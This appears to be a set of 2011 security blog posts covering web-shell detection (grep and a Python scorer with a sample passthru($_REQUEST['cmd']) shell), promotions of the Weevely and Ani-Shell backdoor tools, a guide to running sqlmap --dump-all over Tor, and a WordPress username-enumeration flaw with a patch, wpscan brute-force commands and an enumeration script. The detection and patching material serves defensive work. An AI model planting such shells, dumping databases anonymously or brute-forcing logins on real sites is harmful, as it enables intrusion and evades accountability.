Jun 11, 2011

My blog in mobile version

Now you can visit my blog on your mobile. Try it.


Metasploit Unleashed in PDF Format

That's right, now you can download it to read offline on your laptop or tablet.

The link is here.



Jun 10, 2011

Detecting shell backdoors on a web server

1. Web Shell Detection Using NeoPI - A Python script

2. PHP Shell Scanner - A Perl script

3. PHP script to find malicious code on a hacked server - A PHP script

By the way, for a quick check the following grep command can also be used (it relies on bash brace expansion for the --include patterns, and it will also flag legitimate uses of system(), fopen() and the like, so treat the output as a triage list rather than a verdict):

grep -RPl --include=*.{php,txt,asp} "(passthru|shell_exec|system|phpinfo|base64_decode|chmod|mkdir|fopen|fclose|readfile) *\(" /var/www/

Source: http://www.garage4hackers.com/showthread.php?987-Web-Backdoor-Shell-Detection-on-Servers
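The grep above only catches shells that call the dangerous functions in plain text. As an added example (my own code, not NeoPI or any of the three scanners listed above), here is a small scorer in the same spirit: it counts suspicious calls, weighs eval-of-decoded-blob and user-input-to-exec patterns much higher, and adds points for very long lines and high-entropy quoted strings, which is how packed or base64-wrapped shells show up even when no function name is visible. The three sample sources at the bottom are constructed for the demonstration; the base64 "payload" is just the base64 alphabet standing in for a real encoded blob.

```python
"""Heuristic web-shell triage for PHP trees (added example, not NeoPI)."""
import math
import re
import sys
from pathlib import Path

# Functions a web shell tends to call.  system()/fopen() are also common in
# legitimate code, so they only contribute to a score, never a verdict.
DANGEROUS_CALLS = re.compile(
    r"\b(?:passthru|shell_exec|system|exec|popen|proc_open|phpinfo|eval|"
    r"assert|base64_decode|gzinflate|str_rot13|preg_replace|create_function|"
    r"chmod|mkdir|fopen|readfile)\s*\(", re.I)

# Obfuscation markers: eval() of a decoded blob, request input fed straight
# into an execution function, or preg_replace() with the /e modifier.
OBFUSCATION = re.compile(
    r"eval\s*\(\s*(?:gzinflate|base64_decode|str_rot13|gzuncompress)\s*\("
    r"|(?:system|passthru|shell_exec|exec|eval)\s*\(\s*\$_(?:GET|POST|REQUEST|COOKIE)\b"
    r"|preg_replace\s*\(\s*['\"]/[^'\"]*/[a-z]*e['\"]", re.I)

# Quoted strings long enough to be an encoded payload rather than text.
QUOTED_STRING = re.compile(r"['\"]([A-Za-z0-9+/=]{40,})['\"]")


def shannon_entropy(data: str) -> float:
    """Bits per character; base64 or encrypted payloads sit near 5-6."""
    if not data:
        return 0.0
    counts = {}
    for ch in data:
        counts[ch] = counts.get(ch, 0) + 1
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def score_source(src: str) -> dict:
    """Score one PHP source; higher means more worth a human look."""
    calls = len(DANGEROUS_CALLS.findall(src))
    obf = len(OBFUSCATION.findall(src))
    longest = max((len(line) for line in src.splitlines()), default=0)
    max_entropy = max((shannon_entropy(b) for b in QUOTED_STRING.findall(src)),
                      default=0.0)
    score = calls + 5 * obf          # an obfuscation hit outweighs plain calls
    if longest > 1000:               # minified/packed one-liners
        score += 3
    if max_entropy > 4.5:            # encoded blob inside a string literal
        score += 3
    return {"calls": calls, "obfuscation": obf, "longest_line": longest,
            "max_entropy": round(max_entropy, 2), "score": score}


def scan_tree(root: str, exts=(".php", ".phtml", ".php5", ".inc")) -> list:
    """Score every matching file under root, highest score first."""
    results = []
    for path in Path(root).rglob("*"):
        if path.is_file() and path.suffix.lower() in exts:
            try:
                src = path.read_text(errors="replace")
            except OSError:
                continue
            results.append((score_source(src), str(path)))
    return sorted(results, key=lambda r: r[0]["score"], reverse=True)


# Constructed samples (not files taken from any real host).
SAMPLE_LEGIT = ('<?php\n$fh = fopen("/var/log/app.log", "a");\n'
                'fwrite($fh, date("c") . " request served\\n");\nfclose($fh);\n')
SAMPLE_SHELL = ('<?php if(isset($_REQUEST[\'cmd\'])){ echo "<pre>"; '
                'passthru($_REQUEST[\'cmd\']); echo "</pre>"; } ?>\n')
FAKE_BLOB = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"
SAMPLE_OBFUSCATED = "<?php eval(gzinflate(base64_decode('" + FAKE_BLOB + "'))); ?>\n"


if __name__ == "__main__":
    root = sys.argv[1] if len(sys.argv) > 1 else "/var/www"
    for details, path in scan_tree(root)[:20]:
        print(f"{details['score']:3d}  {path}  {details}")
```

Run it as `python3 shellscore.py /var/www` and review the top of the list by hand; the legitimate logging snippet scores 1 (one fopen call), the one-line passthru shell scores 6, and the eval/gzinflate/base64 wrapper scores 11 even though none of its real payload is visible to grep.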

Jun 8, 2011

Weevely: create and manage PHP trojans designed to be hard to detect

This software is a proof of concept of an unobtrusive PHP backdoor that simulates a complete telnet-like connection, hides its data in HTTP Referer headers and uses a dynamic probe of system-like functions to bypass PHP security restrictions.

Download the latest available version, Weevely 0.3.

Source: https://code.google.com/p/weevely/

Ani-Shell: Mass Mailer, Web-Server Fuzzer, DDoser

Ani-Shell is a simple PHP shell with some unique features like a Mass Mailer, a simple Web-Server Fuzzer, and a DDoser!

Features of Ani-Shell
  • Shell
  • Platform Independent
  • Mass Mailer
  • Small Web-Server Fuzzer
  • DDoser
  • Design

Source: http://www.pentestit.com/2011/06/08/anishell-mass-mailer-webserver-fuzzer-ddoser/

Jun 7, 2011

Howto: Use sqlmap via Tor on Backtrack5

This test was done in my own lab, nothing illegal or anything like that.

1. Edit the repository list
  - vim /etc/apt/sources.list

2. Add Tor's repository to the list (BackTrack 5 is based on Ubuntu 10.04 "lucid", hence the suite name)
  - deb http://deb.torproject.org/torproject.org lucid main

3. Fetch the Tor Project's archive signing key and add it to apt's key list. Check that the full fingerprint gpg prints for the received key matches the one exported below before trusting it.
  - gpg --keyserver keys.gnupg.net --recv 886DDD89
  - gpg --export A3C4F0F979CAA22CDBA8F512EE8CBC9E886DDD89 | sudo apt-key add -

4. Update the package list and install the Tor packages (note "&&", not "&": a single ampersand would background the update and start the install before the package list was refreshed).
  - apt-get update && apt-get install tor tor-geoipdb

5. Get polipo's config file from the Tor website and rename or remove the old one. On Debian-based systems polipo reads /etc/polipo/config, so run these from that directory; polipo must be installed (apt-get install polipo) and restarted after the change.
  - wget https://gitweb.torproject.org/torbrowser.git/blob_plain/HEAD:/build-scripts/config/polipo.conf
  - mv config config-bak
  - cp polipo.conf config

6. Run sqlmap with the "--tor" option (two dashes), which in this sqlmap version sends requests to the HTTP proxy polipo exposes on 127.0.0.1:8118.
  - cd /pentest/web/scanners/sqlmap
  - ./sqlmap.py -u "http://target.com/cart.php?id=1" --dump-all --tor

PS. If you want to get sqlmap from svn, use
  - svn checkout https://svn.sqlmap.org/sqlmap/trunk/sqlmap
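Before pointing sqlmap at a target it is worth confirming that the Tor -> polipo chain really carries the traffic; a misconfigured proxy means every request leaves from your own IP. The script below is an added example (my own, not part of the post, sqlmap or polipo): it checks that /etc/polipo/config carries the settings the Tor polipo.conf sets (socksParentProxy, socksProxyType, proxyAddress, proxyPort), fetches check.torproject.org's JSON endpoint through the HTTP proxy only, and launches sqlmap with --tor only if that endpoint reports IsTor. It assumes tor on 127.0.0.1:9050 and polipo on 127.0.0.1:8118, the sqlmap path used in the post, and that https://check.torproject.org/api/ip answers with {"IsTor": ..., "IP": "..."}. Newer sqlmap versions have a --check-tor option that does the same exit check.

```python
"""Verify the Tor/polipo chain before running sqlmap --tor (added example)."""
import json
import subprocess
import sys
import urllib.request

HTTP_PROXY = "http://127.0.0.1:8118"                 # polipo, assumed
TOR_CHECK = "https://check.torproject.org/api/ip"    # assumed JSON API
SQLMAP = "/pentest/web/scanners/sqlmap/sqlmap.py"    # path from the post
POLIPO_CONFIG = "/etc/polipo/config"

# The settings from the Tor Project's polipo.conf that make polipo forward
# everything to tor's SOCKS port and listen locally on 8118.
POLIPO_SETTINGS = {
    "socksParentProxy": "localhost:9050",
    "socksProxyType": "socks5",
    "proxyAddress": "127.0.0.1",
    "proxyPort": "8118",
}


def polipo_config_missing(config_text: str) -> list:
    """Return the POLIPO_SETTINGS keys that config_text does not set correctly."""
    present = {}
    for raw in config_text.splitlines():
        line = raw.split("#", 1)[0].strip()       # drop comments
        if "=" not in line:
            continue
        key, value = (part.strip() for part in line.split("=", 1))
        present[key] = value.strip('"')            # polipo quotes string values
    return [k for k, v in POLIPO_SETTINGS.items() if present.get(k) != v]


def parse_tor_check(body: bytes):
    """Turn the check.torproject.org JSON body into (is_tor, exit_ip)."""
    data = json.loads(body.decode("utf-8"))
    return bool(data.get("IsTor")), str(data.get("IP", ""))


def exit_via_tor(proxy: str = HTTP_PROXY, timeout: int = 30):
    """Fetch the check URL through the HTTP proxy only, never directly."""
    opener = urllib.request.build_opener(
        urllib.request.ProxyHandler({"http": proxy, "https": proxy}))
    with opener.open(TOR_CHECK, timeout=timeout) as resp:
        return parse_tor_check(resp.read())


def run_sqlmap(target: str) -> int:
    """Run sqlmap --tor against target only after the exit check passes."""
    with open(POLIPO_CONFIG) as fh:
        missing = polipo_config_missing(fh.read())
    if missing:
        raise SystemExit(f"{POLIPO_CONFIG} lacks/mis-sets: {', '.join(missing)}")
    is_tor, ip = exit_via_tor()
    if not is_tor:
        raise SystemExit(f"refusing to run: traffic exits from {ip}, not Tor")
    print(f"Tor exit confirmed ({ip}); starting sqlmap")
    proc = subprocess.run([sys.executable, SQLMAP, "-u", target, "--tor", "--batch"])
    return proc.returncode


if __name__ == "__main__":
    sys.exit(run_sqlmap(sys.argv[1]))
```

Because the opener is built with only a ProxyHandler for http and https, a dead or mis-bound polipo produces a connection error rather than a silent direct fetch, which is the failure mode you want here.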

Jun 6, 2011

Patching WordPress Username Disclosure

On May 26th Veronica Valero of Talsoft S.R.L. posted a security advisory on the Full Disclosure mailing list outlining a username disclosure vulnerability via a Direct Object Reference.
This is a problem in itself; however, what was more interesting to me was Zerial’s reply to the advisory:
“Also you can “enumerate” wordpress users using the wp-login.php. When you enter a non-existent user wordpress returns “Invalid username” and when you enter a valid user with any random/dummy password, wordpress returns “Invalid Password”. Now you can use brute-force to enumerate all valid users using, for example, a name&username dictionary.”
As we can see from a simple test on https://wordpress.org/wp-login.php, what he was saying was true.
Existing user ‘admin’: [screenshot]

Non-existent user ‘nonexistant’: [screenshot]

As we can see from the two screenshots above, there is a clear difference in the error message WordPress displays depending on whether the user exists or not.
According to OSVDB 55713 this vulnerability was reported to WordPress by Core Security Technologies in June 2009. At the time of writing, the latest version of WordPress is 3.1.3 and it is still affected.
Here is how to patch the issue highlighted by ‘Zerial’ yourself. Both error paths live in wp_authenticate_username_password() in wp-includes/user.php; replace each message with the same generic one so the response no longer reveals whether the username exists (the HTML link markup inside the strings has been stripped here):

Before:
return new WP_Error('invalid_username', sprintf(__('ERROR: Invalid username. Lost your password?'), site_url('wp-login.php?action=lostpassword', 'login')));
After:
return new WP_Error('invalid_username', __('ERROR: Invalid username and/or password.'));

Before:
return new WP_Error('incorrect_password', sprintf(__('ERROR: The password you entered for the username %1$s is incorrect. Lost your password?'), $username, site_url('wp-login.php?action=lostpassword', 'login')));
After:
return new WP_Error('incorrect_password', __('ERROR: Invalid username and/or password.'));

Let’s hope WordPress patches this and the one Veronica disclosed sooner rather than later.
After some further research it seems a bug report was filed in 2007 on WordPress’s Trac: http://core.trac.wordpress.org/ticket/3708
“There are other ways to verify user names. You can reverse engineer them from the author archive URLs (e.g. http://example.com/author/mark/). I believe the consensus last time this came up was that it was trivial to figure out the user names anyway, and that it is much more user-friendly to tell them when they messed up their username, and not the password. Also, “admin” is created on install, and can’t be changed using WordPress itself, so there’s no hiding that.”

Update #2: I found a blog that created a script for this flaw. You can visit that blog to download and try it. But please use it legally.

Update #3: A new script for this flaw, wpscan, was released by Ryan Dewhurst. Try this:
1. sudo apt-get install libcurl4-gnutls-dev
2. sudo gem install typhoeus
3. sudo gem install xml-simple
4. svn checkout http://wpscan.googlecode.com/svn/trunk/ wpscan-read-only

Example usage:
ruby wpscan.rb --url www.example.com
ruby wpscan.rb --url www.example.com --wordlist darkc0de.lst --threads 50
ruby wpscan.rb --url www.example.com --wordlist darkc0de.lst --username admin
Source: http://seclists.org/webappsec/2011/q2/48
Source: https://www.infosecisland.com/blogview/14196-Patching-WordPress-Username-Disclosure.html
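To make the oracle concrete, here is an added example of my own (not code from the post, WordPress or wpscan) that does what Zerial describes and also shows why the generic message above closes the hole. It classifies a wp-login.php response by the error text quoted in the post: "The password you entered for the username ... is incorrect" means the account exists, "Invalid username" means it does not, and the patched "Invalid username and/or password" makes the two cases indistinguishable, at which point enumeration stops. The login form field names log/pwd/wp-submit and the login_error div are WordPress's; the response bodies embedded below are constructed from the quoted strings, and the fake_fetch_* helpers stand in for the network so the logic runs offline. Only use the live path against sites you are authorised to test.

```python
"""Classify wp-login.php error responses to detect the username oracle (added example)."""
import re
import urllib.parse
import urllib.request

# Markers for the three messages discussed in the post; tags are stripped first.
WRONG_PASS = re.compile(r"ERROR:\s*The password you entered for the username", re.I)
INVALID_USER = re.compile(r"ERROR:\s*Invalid username\.", re.I)
GENERIC = re.compile(r"ERROR:\s*Invalid username and/or password\.", re.I)


def strip_tags(html: str) -> str:
    return re.sub(r"<[^>]+>", "", html)


def classify(html: str) -> str:
    """'exists', 'absent', 'indistinguishable' (patched) or 'unknown'."""
    text = strip_tags(html)
    if WRONG_PASS.search(text):
        return "exists"
    if INVALID_USER.search(text):
        return "absent"
    if GENERIC.search(text):
        return "indistinguishable"
    return "unknown"


def login_body(base_url: str, username: str, password: str = "x", timeout: int = 20) -> str:
    """POST one login attempt with a dummy password and return the HTML."""
    data = urllib.parse.urlencode(
        {"log": username, "pwd": password, "wp-submit": "Log In"}).encode()
    req = urllib.request.Request(base_url.rstrip("/") + "/wp-login.php",
                                 data=data, headers={"User-Agent": "Mozilla/5.0"})
    with urllib.request.urlopen(req, timeout=timeout) as resp:
        return resp.read().decode("utf-8", "replace")


def enumerate_users(base_url: str, candidates, fetch=login_body) -> list:
    """Return the candidate names the login form confirms as existing."""
    found = []
    for name in candidates:
        verdict = classify(fetch(base_url, name))
        if verdict == "indistinguishable":
            break                      # patched target: no oracle, stop early
        if verdict == "exists":
            found.append(name)
    return found


# Constructed responses modelled on the messages quoted in the post.
UNPATCHED = {
    "admin": ('<div id="login_error"><strong>ERROR</strong>: The password you entered '
              'for the username <strong>admin</strong> is incorrect. '
              '<a href="/wp-login.php?action=lostpassword">Lost your password</a>?</div>'),
    "nonexistant": ('<div id="login_error"><strong>ERROR</strong>: Invalid username. '
                    '<a href="/wp-login.php?action=lostpassword">Lost your password</a>?</div>'),
}
PATCHED_BODY = ('<div id="login_error"><strong>ERROR</strong>: '
                'Invalid username and/or password.</div>')


def fake_fetch_unpatched(base_url, username, password="x"):
    """Stand-in for login_body against a WordPress 3.1.3-style target."""
    return UNPATCHED.get(username, UNPATCHED["nonexistant"])


def fake_fetch_patched(base_url, username, password="x"):
    """Stand-in for login_body against a target with the patch applied."""
    return PATCHED_BODY


if __name__ == "__main__":
    names = ["admin", "editor", "nonexistant"]
    print("unpatched:", enumerate_users("http://example.com", names, fetch=fake_fetch_unpatched))
    print("patched:  ", enumerate_users("http://example.com", names, fetch=fake_fetch_patched))
```

Against the unpatched responses the loop confirms "admin" and rejects the rest; against the patched ones the very first answer is classified as indistinguishable and the loop gives up, which is the behaviour the user.php change is meant to produce. Keep in mind the Trac comment above: author archive URLs still leak usernames even with this patch in place.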